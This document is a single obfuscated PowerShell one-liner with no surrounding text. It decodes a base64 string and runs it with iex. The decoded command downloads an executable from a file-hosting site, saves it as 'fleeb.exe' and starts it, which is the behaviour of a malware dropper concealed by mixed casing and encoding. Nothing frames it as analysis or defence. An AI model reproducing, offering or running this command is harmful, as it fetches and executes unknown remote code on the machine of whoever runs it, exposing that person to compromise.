iex([sYsTEm.text.encoDiNg]::utf8.geTsTrINg([system.cONVERt]::fRoMBASe64StrIng('CihOZXctT2JqZWN0IHNZU1RlTS5OZXQuV0VCQ0xpZU5UKS5kb3dubE9hZEZJbGUoJ2h0dHBzOi8vMWZpY2hpZXIuY29tLz92OHczZzczNmhqJywnZmxlZWIuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWIuZXhlJwoK')));exit

